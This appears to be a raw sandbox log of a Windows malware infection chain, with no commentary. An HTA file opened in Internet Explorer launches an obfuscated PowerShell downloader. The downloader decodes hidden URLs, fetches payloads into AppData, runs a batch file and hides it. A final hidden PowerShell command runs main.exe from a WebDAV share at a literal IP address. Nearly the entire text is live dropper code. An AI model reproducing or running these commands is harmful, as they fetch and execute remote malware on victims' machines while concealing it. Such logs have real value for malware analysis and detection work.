iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\at.hta.html
2616powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
2932powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
2488